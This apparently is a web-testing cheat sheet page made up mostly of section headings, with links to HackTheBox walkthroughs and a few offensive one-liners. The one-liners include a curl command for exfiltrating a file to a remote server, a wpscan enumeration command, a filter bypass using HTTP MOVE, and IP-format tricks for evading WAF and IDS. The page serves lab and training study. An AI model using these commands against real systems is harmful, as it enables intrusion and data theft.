githubEdit

Web Notes

TODO: Need to pull web notes out of the OS Agnostic section (and then rename that to something better!)

circle-check

Checklist

HTTP Response Codes

Headers

HTTP Authorization headers

HTTP Security Headers

Header Bypass Methods

Cookies

JavaScript

Ruby

Python2

Edit cookies in chrome

Settings -> Advanced Settings -> Privacy -> Content -> Cookies

or "Edit This Cookie" plugin

Edit cookies in firefox

Preferences -> Privacy -> Show Cookies

or "Cookies Manager+" addon

Local File Inclusion (LFI) / Remote File Inclusion (RFI)

Common and/or useful files to check for when exploiting Local File Inclusion (for both Linux and Windows): https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFIarrow-up-right

LFI - Retrieve HTML/PHP files without executing

File Upload

HTTP PUT

Cadaver

JPG to PNG shell

Upload Files through POST

OpenVAS Vulnerability Scanner

Misc

IPv6

primer: Ippsec:HacktheBox - Sneakyarrow-up-right

ip6tables - iptables for ipv6

HTTP Authentication Types

XPATH Dump

whatismybrowser.com - research User-Agent strings

Use curl to exfiltrate file on remote server (from attackers box): curl -d @/<file> <remote server>

in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 Ippsec:HacktheBox - Granny & Grandpaarrow-up-right

vulnerability testing for webdav (or other file upload vulns!): davtest

bypassing filetype filters with http MOVE command to rename allowed filetype Ippsec:HacktheBox - Granny & Grandpaarrow-up-right

Wordpress enumeration: wpscan -u <url> [--disable-tls-checks]

pull Google cached webpage if regular site not loading: cache:https://<somewebsite>

Virtual Host Routing: substitute IP for hostname to get different results

hydra against http wordpress login walkthrough: IppSec:HacktheBox - Apocalystarrow-up-right

web application fuzzer: wfuzzarrow-up-right

Web site "flyover" surveillance: Aquatonearrow-up-right "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author (see link). Visual dirbuster?

Crawl web pages for keywords - useful for password/vhost enumeration lists

Common checks

IP conversion

Injecting IPs when '.' is disallowed: convert the standard "dotted decimal" format to decimal, or hex value using -ip2dharrow-up-right. The sending or receiving computer will usually automatically convert it to a format that it can use. This is a great way to bypass WAF, IDS, or other tools that filter on IPs.

If you like this content and would like to see more, please consider buying me a coffeearrow-up-right!

Last updated